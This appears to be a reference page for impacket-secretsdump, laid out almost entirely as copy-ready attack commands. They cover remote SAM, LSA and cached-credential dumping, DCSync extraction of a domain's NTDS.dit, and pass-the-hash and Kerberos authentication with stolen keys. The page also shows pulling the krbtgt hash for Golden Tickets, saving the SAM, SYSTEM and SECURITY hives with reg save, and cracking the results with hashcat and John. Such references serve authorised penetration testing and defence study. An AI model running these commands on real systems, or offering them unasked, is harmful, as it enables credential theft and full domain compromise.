Skip to main content

Overview

impacket-secretsdump extracts credentials from Windows systems both remotely and locally. It can dump SAM hashes, LSA secrets, cached domain credentials, and the full NTDS.dit Active Directory database. Operates over SMB/RPC (ports 445/135) for remote targets or parses registry hives and database files offline. 
impacket-secretsdump <domain>/<user>:<password>@<target>

Authentication Methods

Password

impacket-secretsdump DOMAIN/user:[email protected]

NTLM Hash (Pass-the-Hash)

impacket-secretsdump DOMAIN/[email protected] -hashes LMhash:NThash

# Empty LM hash
impacket-secretsdump DOMAIN/[email protected] -hashes :NThash

# aad3b435b51404eeaad3b435b51404ee is the empty/disabled LM hash
impacket-secretsdump DOMAIN/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:NThash

Kerberos Ticket

# Using ccache from environment
export KRB5CCNAME=/tmp/krb5cc_admin
impacket-secretsdump DOMAIN/[email protected] -k -no-pass

# Requires valid TGT/TGS in the ccache
# Target must be a hostname (not IP) for Kerberos

AES Key

impacket-secretsdump DOMAIN/[email protected] -aesKey <aes128-or-aes256-key>

Remote SAM Dump

Extracts local account NTLM hashes from the remote SAM database. Requires local administrator privileges on the target. 
impacket-secretsdump DOMAIN/admin:[email protected]
Output format: 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Format: username:RID:LMhash:NThash:::

Remote LSA Secrets

Extracted automatically alongside SAM. Contains service account passwords, DPAPI machine keys, cached domain credentials, and auto-logon passwords. 
impacket-secretsdump DOMAIN/admin:[email protected]
Output includes: 
[*] Dumping LSA Secrets
$MACHINE.ACC:plain_password_hex:0123456789abcdef...
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:NThash
DPAPI_SYSTEM:dpapi_machinekey:0x1234... dpapi_userkey:0x5678...
NL$KM:hex_key

Cached Domain Credentials (DCC2)

LSA secrets include cached domain logons (stored as DCC2/mscachev2 hashes): 
[*] Dumping cached domain logon information (domain/username:hash)
DOMAIN/jsmith:$DCC2$10240#jsmith#a8f2b4c...

Remote NTDS.dit Dump

Dumps the entire Active Directory database from a Domain Controller. Requires Domain Admin or equivalent privileges (replication rights for DRSUAPI).

DRSUAPI Method (Default — DCSync)

Uses the Directory Replication Service protocol. Does not touch disk or create shadow copies. Stealthier than VSS. 
# Full domain dump
impacket-secretsdump DOMAIN/admin:[email protected]

# Only NTLM hashes (skip Kerberos keys)
impacket-secretsdump DOMAIN/admin:[email protected] -just-dc-ntlm

VSS Method (Volume Shadow Copy)

Creates a Volume Shadow Copy on the DC, copies NTDS.dit and SYSTEM hive, then parses them. Noisier — writes to disk, creates event logs. 
impacket-secretsdump DOMAIN/admin:[email protected] -use-vss

Output Flags for NTDS

FlagEffect
-just-dcOnly NTDS.dit (skip SAM/LSA)
-just-dc-ntlmOnly NTLM hashes from NTDS (no Kerberos keys)
-just-dc-user USERDump a single user from NTDS
-use-vssUse Volume Shadow Copy instead of DRSUAPI
-historyInclude password history hashes

Local SAM / SYSTEM / SECURITY Parsing

Parse registry hives offline without network access. Useful when you have copied hive files from a compromised machine.

Dump Hives on Target (if you have shell access)

reg save HKLM\SAM C:\sam.save
reg save HKLM\SYSTEM C:\system.save
reg save HKLM\SECURITY C:\security.save

Parse Locally

# SAM + SYSTEM (local account hashes)
impacket-secretsdump -sam sam.save -system system.save LOCAL

# SAM + SYSTEM + SECURITY (includes LSA secrets and cached creds)
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
The SYSTEM hive is always required — it contains the boot key needed to decrypt SAM and SECURITY.

Local NTDS.dit Parsing

Parse a copied NTDS.dit file offline. Requires the SYSTEM hive for decryption. 
# Copy from DC (via shadow copy, backup, etc.)
# ntds.dit is at C:\Windows\NTDS\ntds.dit

impacket-secretsdump -ntds ntds.dit -system system.save LOCAL

# Only NTLM hashes
impacket-secretsdump -ntds ntds.dit -system system.save -just-dc-ntlm LOCAL

# Include history
impacket-secretsdump -ntds ntds.dit -system system.save -history LOCAL

Output Format

SAM Hashes (NTLM)

username:RID:LMhash:NThash:::
  • LMhash is aad3b435b51404eeaad3b435b51404ee when LM is disabled (modern Windows default)
  • NThash is the NTLM hash — this is what you crack or pass

NTDS.dit Hashes

domain\username:RID:LMhash:NThash:::
When using -just-dc (not -just-dc-ntlm), Kerberos keys are also dumped: 
domain\username:aes256-cts-hmac-sha1-96:key
domain\username:aes128-cts-hmac-sha1-96:key
domain\username:des-cbc-md5:key

Cached Domain Credentials (DCC2 / mscachev2)

domain/username:$DCC2$10240#username#hash

LSA Secrets (Plaintext)

ServiceAccountName:plain_password_hex:hexdata

Extracting Specific Users

Dump a single account from NTDS.dit without pulling the entire database: 
# Single user via DCSync
impacket-secretsdump DOMAIN/admin:[email protected] -just-dc-user Administrator

# Machine account
impacket-secretsdump DOMAIN/admin:[email protected] -just-dc-user 'DC01$'

# krbtgt (for Golden Ticket material)
impacket-secretsdump DOMAIN/admin:[email protected] -just-dc-user krbtgt

History Hashes

Dump previous password hashes. Useful when current hash is already known or when looking for password reuse patterns. 
# Remote
impacket-secretsdump DOMAIN/admin:[email protected] -history

# Local
impacket-secretsdump -ntds ntds.dit -system system.save -history LOCAL
Output appends _history0, _history1, etc.: 
domain\user:RID:LMhash:NThash:::
domain\user_history0:RID:LMhash:NThash:::
domain\user_history1:RID:LMhash:NThash:::

Pass-the-Hash

Use an NTLM hash instead of a password for authentication: 
# Standard pass-the-hash
impacket-secretsdump DOMAIN/[email protected] -hashes :NThash

# With full LM:NT pair
impacket-secretsdump DOMAIN/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889

# DCSync via pass-the-hash
impacket-secretsdump DOMAIN/[email protected] -hashes :NThash -just-dc-user krbtgt

Kerberos Authentication

Use Kerberos tickets instead of passwords or hashes: 
# Obtain TGT first (via impacket-getTGT, kinit, or Rubeus)
export KRB5CCNAME=/tmp/krb5cc_admin

# Use ticket — target MUST be hostname, not IP
impacket-secretsdump DOMAIN/[email protected] -k -no-pass

# DCSync with Kerberos
impacket-secretsdump DOMAIN/[email protected] -k -no-pass -just-dc-user krbtgt

# With AES key directly
impacket-secretsdump DOMAIN/[email protected] -aesKey <aes256-key> -k
Ensure DNS resolves the DC hostname or add it to /etc/hosts. Kerberos does not work with IP addresses.

Common Use Cases

Post-Exploitation: Dump Local Hashes

# After compromising a workstation — get local admin hashes
impacket-secretsdump ./admin:[email protected]

DCSync: Extract Domain Hashes

# Full domain dump via DCSync
impacket-secretsdump DOMAIN/admin:[email protected] -just-dc

# Just the krbtgt hash for Golden Ticket
impacket-secretsdump DOMAIN/admin:[email protected] -just-dc-user krbtgt

Offline Analysis: Hives from Disk Image

# Mount disk image, copy hives, parse offline
impacket-secretsdump -sam /mnt/Windows/System32/config/SAM \
  -system /mnt/Windows/System32/config/SYSTEM \
  -security /mnt/Windows/System32/config/SECURITY \
  LOCAL

Offline Analysis: NTDS.dit from Backup

impacket-secretsdump -ntds /mnt/backup/ntds.dit -system /mnt/backup/system.save LOCAL

Output to File

impacket-secretsdump DOMAIN/admin:[email protected] -outputfile dump

# Creates: dump.sam, dump.secrets, dump.ntds, dump.ntds.kerberos, dump.ntds.cleartext

Cracking Extracted Hashes

NTLM Hashes (SAM / NTDS)

# Hashcat mode 1000
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# John
john --format=NT ntlm_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Cached Domain Credentials (DCC2 / mscachev2)

# Hashcat mode 2100 — very slow to crack
hashcat -m 2100 dcc2_hashes.txt /usr/share/wordlists/rockyou.txt

# John
john --format=mscash2 dcc2_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

LM Hashes (Legacy)

# Hashcat mode 3000
hashcat -m 3000 lm_hashes.txt /usr/share/wordlists/rockyou.txt

# John
john --format=LM lm_hashes.txt

Hash Type Summary

Hash TypeHashcat ModeJohn FormatSource
NTLM1000NTSAM, NTDS.dit
LM3000LMSAM (legacy)
DCC2 / mscachev22100mscash2LSA cached creds
NetNTLMv25600netntlmv2Responder (not secretsdump)

Quick Reference — All Flags

FlagDescription
-hashes LM:NTAuthenticate with NTLM hash
-kUse Kerberos authentication
-no-passNo password (use with -k or -aesKey)
-aesKey KEYAuthenticate with AES key
-dc-ip IPIP of the Domain Controller
-target-ip IPIP of the target (if hostname differs)
-just-dcOnly extract NTDS.dit (skip SAM/LSA)
-just-dc-ntlmOnly NTLM hashes from NTDS
-just-dc-user USERExtract single user from NTDS
-use-vssUse Volume Shadow Copy method
-historyInclude password history
-sam FILELocal SAM hive file
-system FILELocal SYSTEM hive file
-security FILELocal SECURITY hive file
-ntds FILELocal NTDS.dit file
-outputfile PREFIXWrite output to files with given prefix
-exec-method METHODRemote exec method: smbexec, wmiexec, mmcexec
-tsAdd timestamp to output
-debugVerbose debug output